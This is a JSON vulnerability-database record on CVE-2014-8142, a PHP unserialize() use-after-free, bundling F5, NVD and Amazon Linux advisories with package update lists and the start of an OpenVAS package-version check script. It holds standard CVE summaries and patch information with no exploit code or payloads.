{"id": "SECURITYVULNS:VULN:14172", "bulletinFamily": "software", "title": "PHP security vulnerabilities", "description": "Use-after-free in unserialize()", "published": "2014-12-23T00:00:00", "modified": "2014-12-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14172", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31552"], "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "6d2dcaed858380d54d5782ad38c55586"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "ba6a8c444f504c95d21968a54608ab9d"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "62467bc660b6f19a378ff0c4c79eff5d"}, {"key": "href", "hash": "65dbd9938bb274beee8b086871a098d6"}, {"key": "modified", "hash": "2e3a60dc9d9e721673571fd36954bf23"}, {"key": "published", "hash": "2e3a60dc9d9e721673571fd36954bf23"}, {"key": "references", "hash": "62654092b7d77437a63418fa19c5f582"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "3a18a828bc11b79a70839be146b3b5a3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "e300bbf96266f96cfaa6052daed682b42c5c78c34917444dff660ec22a0866b1", "viewCount": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:09:58"}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K16021", "SOL16021", "SOL16339"]}, {"type": "cve", "idList": ["CVE-2004-1019", "CVE-2014-8142"]}, {"type": "amazon", "idList": ["ALAS-2015-463", "ALAS-2015-464", "ALAS-2015-475", "ALAS-2015-474"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120454", "OPENVAS:1361412562310120450", "OPENVAS:703117", "OPENVAS:1361412562310805411", "OPENVAS:1361412562310703117", "OPENVAS:1361412562310868654", "OPENVAS:65134", "OPENVAS:136141256231065134", "OPENVAS:54773", "OPENVAS:136141256231065465"]}, {"type": "nessus", "idList": ["SUSE_SU-2015-0365-1.NASL", "OPENSUSE-2015-163.NASL", "PHP_5_4_36.NASL", "ALA_ALAS-2015-464.NASL", "ALA_ALAS-2015-463.NASL", "PHP_5_6_4.NASL", "FEDORA_2014-17229.NASL", "FEDORA_2014-17276.NASL", "PHP_5_5_20.NASL", "MANDRIVA_MDVSA-2015-004.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2015:0365-1", "SUSE-SA:2005:002"]}, {"type": "osvdb", "idList": ["OSVDB:12415"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131845", "PACKETSTORM:138812"]}, {"type": "archlinux", "idList": ["ASA-201412-23", "ASA-201501-17"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3117-1:8494A"]}, {"type": "freebsd", "idList": ["D47E9D19-5016-11D9-9B5F-0050569F0001"]}, {"type": "ubuntu", "idList": ["USN-40-1", "USN-2501-1"]}, {"type": "redhat", "idList": ["RHSA-2005:031", "RHSA-2005:032", "RHSA-2004:687", "RHSA-2005:838", "RHSA-2015:1053", "RHSA-2015:1066"]}, {"type": "slackware", "idList": ["SSA-2014-356-02"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31552", "SECURITYVULNS:DOC:7349", "SECURITYVULNS:DOC:31712", "SECURITYVULNS:DOC:31728"]}, {"type": "centos", "idList": ["CESA-2005:838-01"]}, {"type": "gentoo", "idList": ["GLSA-200412-14", "GLSA-201503-03"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1053", "ELSA-2015-1066"]}], "modified": "2018-08-31T11:09:58"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedSoftware": [{"name": "PHP", "operator": "eq", "version": "5.6"}]}

{"f5": [{"lastseen": "2017-10-12T02:11:04", "bulletinFamily": "software", "description": " \n\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019. ([CVE-2014-8142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142>))\n\nImpact \n\n\nNone. F5 products are not affected by this vulnerability. \n\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:20:00", "published": "2015-01-22T21:25:00", "href": "https://support.f5.com/csp/article/K16021", "id": "F5:K16021", "title": "PHP vulnerability CVE-2014-8142", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:56", "bulletinFamily": "software", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-01-22T00:00:00", "published": "2015-01-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16021.html", "id": "SOL16021", "title": "SOL16021 - PHP vulnerability CVE-2014-8142", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:10:02", "bulletinFamily": "software", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2015-04-01T00:00:00", "published": "2015-04-01T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16339.html", "id": "SOL16339", "title": "SOL16339 - Multiple PHP vulnerabilities CVE-2014-9425, CVE-2014-9426, CVE-2014-9427, CVE-2015-0231, and CVE-2015-0232", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-11-01T05:10:30", "bulletinFamily": "NVD", "description": "The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger \"information disclosure, double-free and negative reference index array underflow\" results.", "modified": "2018-10-30T12:25:35", "published": "2005-01-10T00:00:00", "id": "CVE-2004-1019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1019", "title": "CVE-2004-1019", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:55:24", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.", "modified": "2016-12-30T21:59:13", "published": "2014-12-20T06:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8142", "id": "CVE-2014-8142", "title": "CVE-2014-8142", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:08", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than [CVE-2004-1019 __](<https://access.redhat.com/security/cve/CVE-2004-1019>).\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-xmlrpc-5.5.20-2.94.amzn1.i686 \n php55-embedded-5.5.20-2.94.amzn1.i686 \n php55-dba-5.5.20-2.94.amzn1.i686 \n php55-pgsql-5.5.20-2.94.amzn1.i686 \n php55-gmp-5.5.20-2.94.amzn1.i686 \n php55-enchant-5.5.20-2.94.amzn1.i686 \n php55-soap-5.5.20-2.94.amzn1.i686 \n php55-mbstring-5.5.20-2.94.amzn1.i686 \n php55-ldap-5.5.20-2.94.amzn1.i686 \n php55-common-5.5.20-2.94.amzn1.i686 \n php55-intl-5.5.20-2.94.amzn1.i686 \n php55-imap-5.5.20-2.94.amzn1.i686 \n php55-pdo-5.5.20-2.94.amzn1.i686 \n php55-mysqlnd-5.5.20-2.94.amzn1.i686 \n php55-debuginfo-5.5.20-2.94.amzn1.i686 \n php55-pspell-5.5.20-2.94.amzn1.i686 \n php55-opcache-5.5.20-2.94.amzn1.i686 \n php55-gd-5.5.20-2.94.amzn1.i686 \n php55-recode-5.5.20-2.94.amzn1.i686 \n php55-process-5.5.20-2.94.amzn1.i686 \n php55-cli-5.5.20-2.94.amzn1.i686 \n php55-devel-5.5.20-2.94.amzn1.i686 \n php55-xml-5.5.20-2.94.amzn1.i686 \n php55-tidy-5.5.20-2.94.amzn1.i686 \n php55-mcrypt-5.5.20-2.94.amzn1.i686 \n php55-snmp-5.5.20-2.94.amzn1.i686 \n php55-mssql-5.5.20-2.94.amzn1.i686 \n php55-fpm-5.5.20-2.94.amzn1.i686 \n php55-odbc-5.5.20-2.94.amzn1.i686 \n php55-bcmath-5.5.20-2.94.amzn1.i686 \n php55-5.5.20-2.94.amzn1.i686 \n \n src: \n php55-5.5.20-2.94.amzn1.src \n \n x86_64: \n php55-process-5.5.20-2.94.amzn1.x86_64 \n php55-enchant-5.5.20-2.94.amzn1.x86_64 \n php55-xmlrpc-5.5.20-2.94.amzn1.x86_64 \n php55-pspell-5.5.20-2.94.amzn1.x86_64 \n php55-pdo-5.5.20-2.94.amzn1.x86_64 \n php55-pgsql-5.5.20-2.94.amzn1.x86_64 \n php55-fpm-5.5.20-2.94.amzn1.x86_64 \n php55-xml-5.5.20-2.94.amzn1.x86_64 \n php55-odbc-5.5.20-2.94.amzn1.x86_64 \n php55-cli-5.5.20-2.94.amzn1.x86_64 \n php55-tidy-5.5.20-2.94.amzn1.x86_64 \n php55-soap-5.5.20-2.94.amzn1.x86_64 \n php55-opcache-5.5.20-2.94.amzn1.x86_64 \n php55-snmp-5.5.20-2.94.amzn1.x86_64 \n php55-mysqlnd-5.5.20-2.94.amzn1.x86_64 \n php55-gd-5.5.20-2.94.amzn1.x86_64 \n php55-bcmath-5.5.20-2.94.amzn1.x86_64 \n php55-common-5.5.20-2.94.amzn1.x86_64 \n php55-devel-5.5.20-2.94.amzn1.x86_64 \n php55-recode-5.5.20-2.94.amzn1.x86_64 \n php55-mbstring-5.5.20-2.94.amzn1.x86_64 \n php55-gmp-5.5.20-2.94.amzn1.x86_64 \n php55-mcrypt-5.5.20-2.94.amzn1.x86_64 \n php55-intl-5.5.20-2.94.amzn1.x86_64 \n php55-dba-5.5.20-2.94.amzn1.x86_64 \n php55-ldap-5.5.20-2.94.amzn1.x86_64 \n php55-imap-5.5.20-2.94.amzn1.x86_64 \n php55-5.5.20-2.94.amzn1.x86_64 \n php55-debuginfo-5.5.20-2.94.amzn1.x86_64 \n php55-embedded-5.5.20-2.94.amzn1.x86_64 \n php55-mssql-5.5.20-2.94.amzn1.x86_64 \n \n \n", "modified": "2015-01-08T11:43:00", "published": "2015-01-08T11:43:00", "id": "ALAS-2015-464", "href": "https://alas.aws.amazon.com/ALAS-2015-464.html", "title": "Medium: php55", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:26", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than [CVE-2004-1019 __](<https://access.redhat.com/security/cve/CVE-2004-1019>).\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-bcmath-5.4.36-1.64.amzn1.i686 \n php54-odbc-5.4.36-1.64.amzn1.i686 \n php54-pdo-5.4.36-1.64.amzn1.i686 \n php54-mcrypt-5.4.36-1.64.amzn1.i686 \n php54-pspell-5.4.36-1.64.amzn1.i686 \n php54-snmp-5.4.36-1.64.amzn1.i686 \n php54-xmlrpc-5.4.36-1.64.amzn1.i686 \n php54-debuginfo-5.4.36-1.64.amzn1.i686 \n php54-common-5.4.36-1.64.amzn1.i686 \n php54-devel-5.4.36-1.64.amzn1.i686 \n php54-mssql-5.4.36-1.64.amzn1.i686 \n php54-embedded-5.4.36-1.64.amzn1.i686 \n php54-mbstring-5.4.36-1.64.amzn1.i686 \n php54-cli-5.4.36-1.64.amzn1.i686 \n php54-soap-5.4.36-1.64.amzn1.i686 \n php54-process-5.4.36-1.64.amzn1.i686 \n php54-mysql-5.4.36-1.64.amzn1.i686 \n php54-ldap-5.4.36-1.64.amzn1.i686 \n php54-mysqlnd-5.4.36-1.64.amzn1.i686 \n php54-tidy-5.4.36-1.64.amzn1.i686 \n php54-5.4.36-1.64.amzn1.i686 \n php54-gd-5.4.36-1.64.amzn1.i686 \n php54-xml-5.4.36-1.64.amzn1.i686 \n php54-pgsql-5.4.36-1.64.amzn1.i686 \n php54-recode-5.4.36-1.64.amzn1.i686 \n php54-intl-5.4.36-1.64.amzn1.i686 \n php54-dba-5.4.36-1.64.amzn1.i686 \n php54-enchant-5.4.36-1.64.amzn1.i686 \n php54-imap-5.4.36-1.64.amzn1.i686 \n php54-fpm-5.4.36-1.64.amzn1.i686 \n \n src: \n php54-5.4.36-1.64.amzn1.src \n \n x86_64: \n php54-enchant-5.4.36-1.64.amzn1.x86_64 \n php54-common-5.4.36-1.64.amzn1.x86_64 \n php54-embedded-5.4.36-1.64.amzn1.x86_64 \n php54-debuginfo-5.4.36-1.64.amzn1.x86_64 \n php54-xmlrpc-5.4.36-1.64.amzn1.x86_64 \n php54-process-5.4.36-1.64.amzn1.x86_64 \n php54-gd-5.4.36-1.64.amzn1.x86_64 \n php54-xml-5.4.36-1.64.amzn1.x86_64 \n php54-pdo-5.4.36-1.64.amzn1.x86_64 \n php54-5.4.36-1.64.amzn1.x86_64 \n php54-intl-5.4.36-1.64.amzn1.x86_64 \n php54-cli-5.4.36-1.64.amzn1.x86_64 \n php54-odbc-5.4.36-1.64.amzn1.x86_64 \n php54-mbstring-5.4.36-1.64.amzn1.x86_64 \n php54-imap-5.4.36-1.64.amzn1.x86_64 \n php54-mysql-5.4.36-1.64.amzn1.x86_64 \n php54-snmp-5.4.36-1.64.amzn1.x86_64 \n php54-pgsql-5.4.36-1.64.amzn1.x86_64 \n php54-mcrypt-5.4.36-1.64.amzn1.x86_64 \n php54-soap-5.4.36-1.64.amzn1.x86_64 \n php54-mysqlnd-5.4.36-1.64.amzn1.x86_64 \n php54-devel-5.4.36-1.64.amzn1.x86_64 \n php54-tidy-5.4.36-1.64.amzn1.x86_64 \n php54-pspell-5.4.36-1.64.amzn1.x86_64 \n php54-mssql-5.4.36-1.64.amzn1.x86_64 \n php54-bcmath-5.4.36-1.64.amzn1.x86_64 \n php54-recode-5.4.36-1.64.amzn1.x86_64 \n php54-fpm-5.4.36-1.64.amzn1.x86_64 \n php54-ldap-5.4.36-1.64.amzn1.x86_64 \n php54-dba-5.4.36-1.64.amzn1.x86_64 \n \n \n", "modified": "2015-01-08T11:43:00", "published": "2015-01-08T11:43:00", "id": "ALAS-2015-463", "href": "https://alas.aws.amazon.com/ALAS-2015-463.html", "title": "Medium: php54", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:20", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nsapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping. ([CVE-2014-9427 __](<https://access.redhat.com/security/cve/CVE-2014-9427>))\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for [CVE-2014-8142 __](<https://access.redhat.com/security/cve/CVE-2014-8142>). ([CVE-2015-0231 __](<https://access.redhat.com/security/cve/CVE-2015-0231>))\n\nThe exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image. ([CVE-2015-0232 __](<https://access.redhat.com/security/cve/CVE-2015-0232>))\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-snmp-5.4.37-1.65.amzn1.i686 \n php54-debuginfo-5.4.37-1.65.amzn1.i686 \n php54-pdo-5.4.37-1.65.amzn1.i686 \n php54-bcmath-5.4.37-1.65.amzn1.i686 \n php54-mbstring-5.4.37-1.65.amzn1.i686 \n php54-ldap-5.4.37-1.65.amzn1.i686 \n php54-pspell-5.4.37-1.65.amzn1.i686 \n php54-dba-5.4.37-1.65.amzn1.i686 \n php54-intl-5.4.37-1.65.amzn1.i686 \n php54-fpm-5.4.37-1.65.amzn1.i686 \n php54-process-5.4.37-1.65.amzn1.i686 \n php54-common-5.4.37-1.65.amzn1.i686 \n php54-mssql-5.4.37-1.65.amzn1.i686 \n php54-pgsql-5.4.37-1.65.amzn1.i686 \n php54-tidy-5.4.37-1.65.amzn1.i686 \n php54-recode-5.4.37-1.65.amzn1.i686 \n php54-odbc-5.4.37-1.65.amzn1.i686 \n php54-imap-5.4.37-1.65.amzn1.i686 \n php54-xml-5.4.37-1.65.amzn1.i686 \n php54-embedded-5.4.37-1.65.amzn1.i686 \n php54-enchant-5.4.37-1.65.amzn1.i686 \n php54-gd-5.4.37-1.65.amzn1.i686 \n php54-xmlrpc-5.4.37-1.65.amzn1.i686 \n php54-cli-5.4.37-1.65.amzn1.i686 \n php54-mysqlnd-5.4.37-1.65.amzn1.i686 \n php54-devel-5.4.37-1.65.amzn1.i686 \n php54-mysql-5.4.37-1.65.amzn1.i686 \n php54-soap-5.4.37-1.65.amzn1.i686 \n php54-5.4.37-1.65.amzn1.i686 \n php54-mcrypt-5.4.37-1.65.amzn1.i686 \n \n src: \n php54-5.4.37-1.65.amzn1.src \n \n x86_64: \n php54-5.4.37-1.65.amzn1.x86_64 \n php54-tidy-5.4.37-1.65.amzn1.x86_64 \n php54-intl-5.4.37-1.65.amzn1.x86_64 \n php54-pgsql-5.4.37-1.65.amzn1.x86_64 \n php54-mcrypt-5.4.37-1.65.amzn1.x86_64 \n php54-soap-5.4.37-1.65.amzn1.x86_64 \n php54-gd-5.4.37-1.65.amzn1.x86_64 \n php54-dba-5.4.37-1.65.amzn1.x86_64 \n php54-bcmath-5.4.37-1.65.amzn1.x86_64 \n php54-ldap-5.4.37-1.65.amzn1.x86_64 \n php54-mbstring-5.4.37-1.65.amzn1.x86_64 \n php54-devel-5.4.37-1.65.amzn1.x86_64 \n php54-snmp-5.4.37-1.65.amzn1.x86_64 \n php54-mysqlnd-5.4.37-1.65.amzn1.x86_64 \n php54-debuginfo-5.4.37-1.65.amzn1.x86_64 \n php54-enchant-5.4.37-1.65.amzn1.x86_64 \n php54-imap-5.4.37-1.65.amzn1.x86_64 \n php54-recode-5.4.37-1.65.amzn1.x86_64 \n php54-common-5.4.37-1.65.amzn1.x86_64 \n php54-mssql-5.4.37-1.65.amzn1.x86_64 \n php54-odbc-5.4.37-1.65.amzn1.x86_64 \n php54-mysql-5.4.37-1.65.amzn1.x86_64 \n php54-pspell-5.4.37-1.65.amzn1.x86_64 \n php54-pdo-5.4.37-1.65.amzn1.x86_64 \n php54-xmlrpc-5.4.37-1.65.amzn1.x86_64 \n php54-cli-5.4.37-1.65.amzn1.x86_64 \n php54-xml-5.4.37-1.65.amzn1.x86_64 \n php54-embedded-5.4.37-1.65.amzn1.x86_64 \n php54-process-5.4.37-1.65.amzn1.x86_64 \n php54-fpm-5.4.37-1.65.amzn1.x86_64 \n \n \n", "modified": "2015-02-11T19:46:00", "published": "2015-02-11T19:46:00", "id": "ALAS-2015-475", "href": "https://alas.aws.amazon.com/ALAS-2015-475.html", "title": "Medium: php54", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:16", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nsapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping. ([CVE-2014-9427 __](<https://access.redhat.com/security/cve/CVE-2014-9427>))\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for [CVE-2014-8142 __](<https://access.redhat.com/security/cve/CVE-2014-8142>). ([CVE-2015-0231 __](<https://access.redhat.com/security/cve/CVE-2015-0231>))\n\nThe exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image. ([CVE-2015-0232 __](<https://access.redhat.com/security/cve/CVE-2015-0232>))\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-embedded-5.5.21-1.96.amzn1.i686 \n php55-pspell-5.5.21-1.96.amzn1.i686 \n php55-mysqlnd-5.5.21-1.96.amzn1.i686 \n php55-imap-5.5.21-1.96.amzn1.i686 \n php55-dba-5.5.21-1.96.amzn1.i686 \n php55-xmlrpc-5.5.21-1.96.amzn1.i686 \n php55-xml-5.5.21-1.96.amzn1.i686 \n php55-odbc-5.5.21-1.96.amzn1.i686 \n php55-mbstring-5.5.21-1.96.amzn1.i686 \n php55-snmp-5.5.21-1.96.amzn1.i686 \n php55-tidy-5.5.21-1.96.amzn1.i686 \n php55-recode-5.5.21-1.96.amzn1.i686 \n php55-common-5.5.21-1.96.amzn1.i686 \n php55-opcache-5.5.21-1.96.amzn1.i686 \n php55-mcrypt-5.5.21-1.96.amzn1.i686 \n php55-debuginfo-5.5.21-1.96.amzn1.i686 \n php55-gmp-5.5.21-1.96.amzn1.i686 \n php55-fpm-5.5.21-1.96.amzn1.i686 \n php55-5.5.21-1.96.amzn1.i686 \n php55-pdo-5.5.21-1.96.amzn1.i686 \n php55-bcmath-5.5.21-1.96.amzn1.i686 \n php55-ldap-5.5.21-1.96.amzn1.i686 \n php55-process-5.5.21-1.96.amzn1.i686 \n php55-mssql-5.5.21-1.96.amzn1.i686 \n php55-enchant-5.5.21-1.96.amzn1.i686 \n php55-gd-5.5.21-1.96.amzn1.i686 \n php55-devel-5.5.21-1.96.amzn1.i686 \n php55-pgsql-5.5.21-1.96.amzn1.i686 \n php55-soap-5.5.21-1.96.amzn1.i686 \n php55-intl-5.5.21-1.96.amzn1.i686 \n php55-cli-5.5.21-1.96.amzn1.i686 \n \n src: \n php55-5.5.21-1.96.amzn1.src \n \n x86_64: \n php55-pgsql-5.5.21-1.96.amzn1.x86_64 \n php55-enchant-5.5.21-1.96.amzn1.x86_64 \n php55-gd-5.5.21-1.96.amzn1.x86_64 \n php55-pspell-5.5.21-1.96.amzn1.x86_64 \n php55-xmlrpc-5.5.21-1.96.amzn1.x86_64 \n php55-common-5.5.21-1.96.amzn1.x86_64 \n php55-mysqlnd-5.5.21-1.96.amzn1.x86_64 \n php55-bcmath-5.5.21-1.96.amzn1.x86_64 \n php55-ldap-5.5.21-1.96.amzn1.x86_64 \n php55-xml-5.5.21-1.96.amzn1.x86_64 \n php55-intl-5.5.21-1.96.amzn1.x86_64 \n php55-soap-5.5.21-1.96.amzn1.x86_64 \n php55-debuginfo-5.5.21-1.96.amzn1.x86_64 \n php55-opcache-5.5.21-1.96.amzn1.x86_64 \n php55-pdo-5.5.21-1.96.amzn1.x86_64 \n php55-mcrypt-5.5.21-1.96.amzn1.x86_64 \n php55-fpm-5.5.21-1.96.amzn1.x86_64 \n php55-mssql-5.5.21-1.96.amzn1.x86_64 \n php55-gmp-5.5.21-1.96.amzn1.x86_64 \n php55-cli-5.5.21-1.96.amzn1.x86_64 \n php55-odbc-5.5.21-1.96.amzn1.x86_64 \n php55-imap-5.5.21-1.96.amzn1.x86_64 \n php55-process-5.5.21-1.96.amzn1.x86_64 \n php55-5.5.21-1.96.amzn1.x86_64 \n php55-mbstring-5.5.21-1.96.amzn1.x86_64 \n php55-dba-5.5.21-1.96.amzn1.x86_64 \n php55-devel-5.5.21-1.96.amzn1.x86_64 \n php55-snmp-5.5.21-1.96.amzn1.x86_64 \n php55-recode-5.5.21-1.96.amzn1.x86_64 \n php55-embedded-5.5.21-1.96.amzn1.x86_64 \n php55-tidy-5.5.21-1.96.amzn1.x86_64 \n \n \n", "modified": "2015-02-11T19:46:00", "published": "2015-02-11T19:46:00", "id": "ALAS-2015-474", "href": "https://alas.aws.amazon.com/ALAS-2015-474.html", "title": "Medium: php55", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-10-02T14:31:34", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120454", "title": "Amazon Linux Local Check: alas-2015-463", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-463.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120454\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-463\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 